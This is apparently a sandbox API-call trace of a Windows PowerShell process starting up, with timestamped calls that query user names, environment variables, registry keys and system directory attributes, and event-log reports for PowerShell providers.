	[0839.497] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d220 | out: lpFileInformation=0x24d220*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.497] SetErrorMode (uMode=0x1) returned 0x1
	[0839.497] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d060, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0839.497] SetErrorMode (uMode=0x1) returned 0x1
	[0839.497] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2c0 | out: lpFileInformation=0x24d2c0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0839.497] SetErrorMode (uMode=0x1) returned 0x1
	[0839.498] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0839.498] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0839.498] CoTaskMemFree (pv=0x1b807960) 
	[0839.498] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0839.498] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0839.499] CoTaskMemFree (pv=0x129840) 
	[0839.499] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3014188*="FileSystem", lpRawData=0x3013f18) returned 1
	[0839.518] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.518] CoTaskMemFree (pv=0x181480) 
	[0839.519] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0839.519] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0839.519] CoTaskMemFree (pv=0x1b807960) 
	[0839.520] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0839.520] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0839.520] CoTaskMemFree (pv=0x129840) 
	[0839.520] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x30199c8*="Function", lpRawData=0x3019758) returned 1
	[0839.529] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0839.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0839.529] CoTaskMemFree (pv=0x181480) 
	[0840.904] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0840.904] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0840.905] CoTaskMemFree (pv=0x1b807960) 
	[0840.905] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0840.905] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0840.906] CoTaskMemFree (pv=0x129840) 
	[0840.906] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x303c1f0*="Registry", lpRawData=0x303bf80) returned 1
	[0841.579] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0841.579] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0841.579] CoTaskMemFree (pv=0x1b807960) 
	[0841.579] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0841.579] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0841.580] CoTaskMemFree (pv=0x129840) 
	[0841.580] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3041608*="Variable", lpRawData=0x3041398) returned 1
	[0841.581] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0841.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.581] CoTaskMemFree (pv=0x181480) 
	[0841.581] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0841.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.581] CoTaskMemFree (pv=0x181480) 
	[0845.383] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0845.383] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d6c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d6c8) returned 0x1
	[0845.383] CoTaskMemFree (pv=0x1b807960) 
	[0845.383] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0845.383] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d708 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d708) returned 1
	[0845.384] CoTaskMemFree (pv=0x129840) 
	[0845.384] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x3055220*="Certificate", lpRawData=0x3054fb0) returned 1
	[0846.348] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0846.348] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.348] CoTaskMemFree (pv=0x181480) 
	[0846.352] GetLogicalDrives () returned 0x4
	[0846.352] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24d350, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0846.352] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0846.353] CoTaskMemAlloc (cb=0x20e) returned 0x1710f0
	[0846.357] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1710f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0846.358] CoTaskMemFree (pv=0x1710f0) 
	[0846.359] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0846.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.359] CoTaskMemFree (pv=0x181480) 
	[0846.359] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0846.360] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.360] CoTaskMemFree (pv=0x181480) 
	[0846.378] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0846.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0846.379] CoTaskMemFree (pv=0x181480) 
	[0847.345] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0847.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0847.345] CoTaskMemFree (pv=0x181480) 
	[0847.346] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0847.346] SetErrorMode (uMode=0x1) returned 0x1
	[0847.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.489] SetErrorMode (uMode=0x1) returned 0x1
	[0849.489] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.489] SetErrorMode (uMode=0x1) returned 0x1
	[0849.489] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.489] SetErrorMode (uMode=0x1) returned 0x1
	[0849.490] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0849.490] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0849.490] CoTaskMemFree (pv=0x181480) 
	[0849.499] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d250, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.500] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.500] SetErrorMode (uMode=0x1) returned 0x1
	[0849.500] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.500] SetErrorMode (uMode=0x1) returned 0x1
	[0849.500] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.500] SetErrorMode (uMode=0x1) returned 0x1
	[0849.500] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0849.501] SetErrorMode (uMode=0x1) returned 0x1
	[0849.501] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.501] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0849.501] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.501] SetErrorMode (uMode=0x1) returned 0x1
	[0849.501] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0849.501] SetErrorMode (uMode=0x1) returned 0x1
	[0849.501] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.501] SetErrorMode (uMode=0x1) returned 0x1
	[0849.502] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0849.502] SetErrorMode (uMode=0x1) returned 0x1
	[0849.502] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.502] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.502] SetErrorMode (uMode=0x1) returned 0x1
	[0849.502] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.502] SetErrorMode (uMode=0x1) returned 0x1
	[0849.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.503] SetErrorMode (uMode=0x1) returned 0x1
	[0849.503] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d2d0 | out: lpFileInformation=0x24d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.503] SetErrorMode (uMode=0x1) returned 0x1
	[0849.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.503] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.504] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.504] SetErrorMode (uMode=0x1) returned 0x1
	[0849.504] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0849.504] SetErrorMode (uMode=0x1) returned 0x1
	[0849.504] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.504] SetErrorMode (uMode=0x1) returned 0x1
	[0849.504] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0849.504] SetErrorMode (uMode=0x1) returned 0x1
	[0849.504] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0849.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.505] SetErrorMode (uMode=0x1) returned 0x1
	[0849.505] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.505] SetErrorMode (uMode=0x1) returned 0x1
	[0849.505] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.505] SetErrorMode (uMode=0x1) returned 0x1
	[0849.506] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d310 | out: lpFileInformation=0x24d310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.506] SetErrorMode (uMode=0x1) returned 0x1
	[0849.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.506] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.512] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x24d370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0849.512] SetErrorMode (uMode=0x1) returned 0x1
	[0849.512] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x24d5d0 | out: lpFileInformation=0x24d5d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0849.512] SetErrorMode (uMode=0x1) returned 0x1
	[0849.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0849.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0851.184] CoTaskMemAlloc (cb=0x804) returned 0x1b807960
	[0851.184] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b807960, nSize=0x24d938 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d938) returned 0x1
	[0851.184] CoTaskMemFree (pv=0x1b807960) 
	[0851.185] CoTaskMemAlloc (cb=0x204) returned 0x129840
	[0851.185] GetUserNameW (in: lpBuffer=0x129840, pcbBuffer=0x24d978 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d978) returned 1
	[0851.185] CoTaskMemFree (pv=0x129840) 
	[0851.186] ReportEventW (hEventLog=0x27d0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x308df08*="Available", lpRawData=0x308dc98) returned 1
	[0852.796] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.796] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.796] CoTaskMemFree (pv=0x181480) 
	[0852.797] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.797] CoTaskMemFree (pv=0x181480) 
	[0852.800] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.800] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0852.801] CoTaskMemFree (pv=0x181480) 
	[0852.801] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.801] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0852.801] CoTaskMemFree (pv=0x181480) 
	[0852.804] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d958 | out: phkResult=0x24d958*=0x380) returned 0x0
	[0852.804] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8dc, lpData=0x0, lpcbData=0x24d8d8*=0x0 | out: lpType=0x24d8dc*=0x1, lpData=0x0, lpcbData=0x24d8d8*=0x56) returned 0x0
	[0852.804] CoTaskMemAlloc (cb=0x5a) returned 0x1b7f9170
	[0852.804] RegQueryValueExW (in: hKey=0x380, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d8ac, lpData=0x1b7f9170, lpcbData=0x24d8a8*=0x56 | out: lpType=0x24d8ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d8a8*=0x56) returned 0x0
	[0852.804] CoTaskMemFree (pv=0x1b7f9170) 
	[0852.804] RegCloseKey (hKey=0x380) returned 0x0
	[0852.807] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.807] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.807] CoTaskMemFree (pv=0x181480) 
	[0852.825] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0852.825] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0852.825] CoTaskMemFree (pv=0x181480) 
	[0854.445] CoTaskMemAlloc (cb=0x104) returned 0x181480
	[0854.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x181480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0854.445] CoTaskMemFree (pv=0x181480) 
	[0854.446] CoTaskMemAlloc (cb=0x104) returned 0x181480
